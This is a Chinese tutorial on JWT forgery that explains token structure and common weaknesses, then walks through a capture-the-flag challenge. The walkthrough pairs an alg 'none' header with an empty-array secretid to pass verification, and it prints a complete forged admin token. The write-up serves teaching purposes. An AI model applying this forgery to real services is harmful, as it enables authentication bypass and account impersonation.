JWT偽造怎么實(shí)現(xiàn)

這篇文章主要講解了“JWT偽造怎么實(shí)現(xiàn)”，文中的講解內(nèi)容簡(jiǎn)單清晰，易于學(xué)習(xí)與理解，下面請(qǐng)大家跟著小編的思路慢慢深入，一起來研究和學(xué)習(xí)“JWT偽造怎么實(shí)現(xiàn)”吧！

簡(jiǎn)單介紹一下什么是JWT

Json web token (JWT), 是為了在網(wǎng)絡(luò)應(yīng)用環(huán)境間傳遞聲明而執(zhí)行的一種基于JSON的開放標(biāo)準(zhǔn)（(RFC 7519).該token被設(shè)計(jì)為緊湊且安全的，特別適用于分布式站點(diǎn)的單點(diǎn)登錄（SSO）場(chǎng)景。JWT的聲明一般被用來在身份提供者和服務(wù)提供者間傳遞被認(rèn)證的用戶身份信息，以便于從資源服務(wù)器獲取資源，也可以增加一些額外的其它業(yè)務(wù)邏輯所必須的聲明信息，該token也可直接被用于認(rèn)證，也可被加密。

實(shí)際像這么一段數(shù)據(jù)

這串?dāng)?shù)據(jù)以(.)作為分隔符分為三個(gè)部分，依次如下：

• Header
  

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 解碼為 {   "alg": "HS256",   "typ": "JWT" }
alg屬性表示簽名的算法（algorithm），默認(rèn)是 HMAC SHA256（寫成 HS256）；typ屬性表示這個(gè)令牌（token）的類型（type），JWT 令牌統(tǒng)一寫為JWT

• Payload
  

eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ 
解碼為
 {   "sub": "1234567890",   "name": "John Doe",   "iat": 1516239022 }
JWT 規(guī)定了7個(gè)官方字段，供選用
iss (issuer)：簽發(fā)人
exp (expiration time)：過期時(shí)間
sub (subject)：主題
aud (audience)：受眾
nbf (Not Before)：生效時(shí)間
iat (Issued At)：簽發(fā)時(shí)間
jti (JWT ID)：編號(hào)

• Signature
  

Signature 部分是對(duì)前兩部分的簽名，防止數(shù)據(jù)篡改。

首先，需要指定一個(gè)密鑰（secret）。這個(gè)密鑰只有服務(wù)器才知道，不能泄露給用戶。然后，使用 Header 里面指定的簽名算法（默認(rèn)是 HMAC SHA256），按照下面的公式產(chǎn)生簽名。

HMACSHA256(   base64UrlEncode(header) + "." +   base64UrlEncode(payload),   secret )

算出簽名以后，把 Header、Payload、Signature 三個(gè)部分拼成一個(gè)字符串，每個(gè)部分之間用"點(diǎn)"（.）分隔，就可以返回給用戶。

JWT安全問題一般有以下

1. 修改算法為none
   

2. 修改算法從RS256到HS256
   

3. 信息泄漏 密鑰泄漏
   

4. 爆破密鑰
   

首先是一個(gè)登錄框，我們先注冊(cè)一個(gè)賬號(hào)admin123，admin123

看題目意思應(yīng)該是想辦法變成admin來登錄

查看前端代碼js/app.js

/** 
 *  或許該用 koa-static 來處理靜態(tài)文件 
 *  路徑該怎么配置？不管了先填個(gè)根目錄XD 
 */  
 
function login() {  
    const username = $("#username").val();  
    const password = $("#password").val();  
    const token = sessionStorage.getItem("token");  
    $.post("/api/login", {username, password, authorization:token})  
        .done(function(data) {  
            const {status} = data;  
            if(status) {  
                document.location = "/home";  
            }  
        })  
        .fail(function(xhr, textStatus, errorThrown) {  
            alert(xhr.responseJSON.message);  
        });  
}  
 
function register() {  
    const username = $("#username").val();  
    const password = $("#password").val();  
    $.post("/api/register", {username, password})  
        .done(function(data) {  
            const { token } = data;  
            sessionStorage.setItem('token', token);  
            document.location = "/login";  
        })  
        .fail(function(xhr, textStatus, errorThrown) {  
            alert(xhr.responseJSON.message);  
        });  
}  
 
function logout() {  
    $.get('/api/logout').done(function(data) {  
        const {status} = data;  
        if(status) {  
            document.location = '/login';  
        }  
    });  
}  
 
function getflag() {  
    $.get('/api/flag').done(function(data) {  
        const {flag} = data;  
        $("#username").val(flag);  
    }).fail(function(xhr, textStatus, errorThrown) {  
        alert(xhr.responseJSON.message);  
    });  
}

根據(jù)注釋符提示可以發(fā)現(xiàn)存在源碼泄露問題

接著發(fā)現(xiàn)了源碼泄漏

訪問app.js，controller.js，rest.js即可得到源代碼

關(guān)鍵代碼controllers/api.js

const crypto = require('crypto');  
 
const fs = require('fs')  
 
const jwt = require('jsonwebtoken')  
 
 
const APIError = require('../rest').APIError;  
 
 
module.exports = {  
 
    'POST /api/register': async (ctx, next) => {  
 
        const {username, password} = ctx.request.body;  
 
 
        if(!username || username === 'admin'){  
 
            throw new APIError('register error', 'wrong username');  
 
        }  
 
 
        if(global.secrets.length > 100000) {  
 
            global.secrets = [];  
 
        }  
 
 
        const secret = crypto.randomBytes(18).toString('hex');  
 
        const secretid = global.secrets.length;  
 
        global.secrets.push(secret)  
 
 
        const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'});  
 
 
 
        ctx.rest({  
 
            token: token  
 
        });  
 
 
        await next();  
 
    },  
 
 
 
    'POST /api/login': async (ctx, next) => {  
 
        const {username, password} = ctx.request.body;  
 
 
        if(!username || !password) {  
 
            throw new APIError('login error', 'username or password is necessary');  
 
        }  
 
 
 
        const token = ctx.header.authorization || ctx.request.body.authorization || ctx.request.query.authorization;  
 
 
        const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;  
 
 
 
        console.log(sid)  
 
 
        if(sid === undefined || sid === null || !(sid < global.secrets.length && sid >= 0)) {  
 
            throw new APIError('login error', 'no such secret id');  
 
        }  
 
 
        const secret = global.secrets[sid];  
 
 
        const user = jwt.verify(token, secret, {algorithm: 'HS256'});  
 
 
        const status = username === user.username && password === user.password;  
 
 
        if(status) {  
 
            ctx.session.username = username;  
 
        }  
 
 
        ctx.rest({  
 
            status  
 
        });  
 
 
        await next();  
 
    },  
 
 
    'GET /api/flag': async (ctx, next) => {  
 
        if(ctx.session.username !== 'admin'){  
 
            throw new APIError('permission error', 'permission denied');  
 
        }  
 
 
        const flag = fs.readFileSync('/flag').toString();  
 
        ctx.rest({  
 
            flag  
 
        });  
 
 
        await next();  
 
    },  
 
 
    'GET /api/logout': async (ctx, next) => {  
 
        ctx.session.username = null;  
 
        ctx.rest({  
 
            status: true  
 
        })  
 
        await next();  
 
    }  
 
};

嘗試注冊(cè)，可以看到在注冊(cè)的時(shí)候生成了一個(gè)token，并存在sessionStorage中

得到：

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzZWNyZXRpZCI6MSwidXNlcm5hbWUiOiJhZG1pbjEyMyIsInBhc3N3b3JkIjoiYWRtaW4xMjMiLCJpYXQiOjE1ODczNzg4MjB9.o5ePpkaTQcSBxmOV-z6hBsWmvvbkd1a_C6Eu7Dpok4Q

解密得到：

token生成過程

const secret = crypto.randomBytes(18).toString('hex');  
const secretid = global.secrets.length;  
global.secrets.push(secret)  
const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'});

看看各種條件，這里會(huì)先對(duì)sid進(jìn)行驗(yàn)證，我們需要繞過這條認(rèn)證，下面還有一個(gè)jwt.verify()的驗(yàn)證并賦值給user

const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;  
console.log(sid)  
if(sid === undefined || sid === null || !(sid < global.secrets.length && sid >= 0)) {  
    throw new APIError('login error', 'no such secret id');  
}  
const secret = global.secrets[sid];  
const user = jwt.verify(token, secret, {algorithm: 'HS256'});  
const status = username === user.username && password === user.password;  
.....  
....  
'GET /api/flag': async (ctx, next) => {  
    if(ctx.session.username !== 'admin'){  
        throw new APIError('permission error', 'permission denied');  
    }

這里的密鑰是生成了18位，基本沒有爆破的可能性，我們使用的方法是將算法（alg）設(shè)置為none，接著我們需要讓jwt.verify()驗(yàn)證中的secret為空，這里有個(gè)tricks

$ node  
> const secrets = [1,2,3,4]  
undefined  
> const sid = []  
undefined  
> const secret = secrets[sid]  
undefined  
> secret  
undefined

再看看能不能過條件

const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;
運(yùn)行結(jié)果
> sid < secrets.length  
true  
> sid >= 0  
true  
我們將header修改
原：  
{  
  "alg": "HS256",  
  "typ": "JWT"  
}  
===>  
{  
  "alg": "none",  
  "typ": "JWT"  
}  
并加密為  
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0  
修改payload
{  
  "secretid": 1,  
  "username": "admin123",  
  "password": "admin123",  
  "iat": 1587378820  
}  
===>  
{  
  "secretid": [],  
  "username": "admin",  
  "password": "admin123",  
  "iat": 1587378820  
}  
并加密為  
eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6ImFkbWluMTIzIiwiaWF0IjoxNTg3Mzc4ODIwfQ

最后使用（.）進(jìn)行拼接得到偽造的token

eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6ImFkbWluMTIzIiwiaWF0IjoxNTg3Mzc4ODIwfQ.

修改sessionStorage

接著使用admin，admin123登錄訪問api/flag，即可得到flag

感謝各位的閱讀，以上就是“JWT偽造怎么實(shí)現(xiàn)”的內(nèi)容了，經(jīng)過本文的學(xué)習(xí)后，相信大家對(duì)JWT偽造怎么實(shí)現(xiàn)這一問題有了更深刻的體會(huì)，具體使用情況還需要大家實(shí)踐驗(yàn)證。這里是億速云，小編將為大家推送更多相關(guān)知識(shí)點(diǎn)的文章，歡迎關(guān)注！